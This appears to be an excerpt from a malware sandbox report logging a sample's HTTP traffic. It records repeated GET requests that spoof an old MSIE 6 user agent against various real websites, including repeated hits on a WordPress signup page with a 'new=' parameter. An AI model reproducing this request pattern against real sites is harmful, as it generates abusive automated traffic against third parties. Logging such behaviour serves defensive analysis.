                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5372
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4428
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5076
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4272
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 3856
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5372
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.ukContent-Length: 4336
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5076
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4272
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4868
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5456
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 3856
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
